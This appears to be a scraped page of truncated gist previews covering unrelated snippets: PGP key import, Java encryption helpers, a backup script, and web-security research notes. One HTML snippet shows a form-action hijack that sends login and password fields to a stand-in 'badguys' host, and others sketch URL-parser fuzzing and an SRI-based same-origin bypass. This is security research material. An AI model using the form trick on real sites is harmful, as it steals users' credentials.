This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* Imports a public key to the key server. | |
* @param {!e2e.openpgp.block.TransferablePublicKey} key The ASCII | |
* armored or {e2e.openpgp.block.TransferablePublicKey} key to import. | |
* @return {!e2e.async.Result.<boolean>} True if importing key is succeeded. | |
*/ | |
e2e.openpgp.KeyClient.prototype.importPublicKey = function(key) { | |
var uids = key.getUserIds(); | |
if (uids.length != 1) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Misia jest cudowna :* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.UnsupportedEncodingException; | |
import java.security.GeneralSecurityException; | |
import javax.crypto.Cipher; | |
import javax.crypto.spec.DESedeKeySpec; | |
import javax.crypto.spec.IvParameterSpec; | |
import javax.crypto.spec.SecretKeySpec; | |
/** | |
* Helper class for encrypting and decrypting payloads using arbitrary string passphrases. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.UnsupportedEncodingException; | |
import java.security.GeneralSecurityException; | |
import javax.crypto.Cipher; | |
import javax.crypto.spec.DESedeKeySpec; | |
import javax.crypto.spec.IvParameterSpec; | |
import javax.crypto.spec.SecretKeySpec; | |
/** | |
* Helper class for encrypting and decrypting payloads using arbitrary string passphrases. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// prepare options | |
$a = array( | |
'top 1' => array( | |
'sub 1' => 100, | |
'sub 2' => array('sub sub 1' => 101, 'sub sub 2' => 102), | |
), | |
'top 2' => 103 | |
); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<form action="//same-origin"> | |
<input name=login> | |
<input name=password type=password> | |
.<!-- this will probably be autocompleted --> | |
<button type=submit form-action="//badguys">clickme</button> | |
</form> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
PROG=$0 | |
# use macports rsync 3.x - Apple's 2.6 hung on sockets | |
RSYNC="/opt/local/bin/rsync" | |
SRC="/" | |
DST="/Volumes/Backup/" | |
FILEVAULT_ACCT="Users/yourusername" | |
# rsync options |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<a id=a href="http://<?php | |
$blacklist = ':@#"?`/\\'; | |
for ($i = 33; $i < 255; $i++) { | |
if (strpos($blacklist, chr($i)) !== false) { | |
echo urlencode(chr($i)); | |
} else | |
//echo urlencode(chr($i)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://w3c.github.io/webappsec/specs/subresourceintegrity/ | |
issues: | |
"3.3.2 Is resource eligible for integrity validation | |
In order to mitigate an attackers ability to read data cross-origin by brute-forcing values via integrity checks, resources are only eligible for such checks if they are same-origin, publically cachable, or is the result of a granted the loading origin explicit access via CORS. [CORS] The following algorithm details these restrictions:" | |
publically cacheable != attacker could could read them anyway. For example - cross origin intranet resources. What if intranet resource is publicly cacheable? still allows for bruteforcing intranet resource body from internet (SOP bypass) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var page = require('webpage').create(), | |
system = require('system'), | |
address; | |
page.onInitialized = function () { | |
page.evaluate(function () { | |
// additional detection code here perhaps | |
// f.e. detecting STORED/DOM XSS | |
}); |
OlderNewer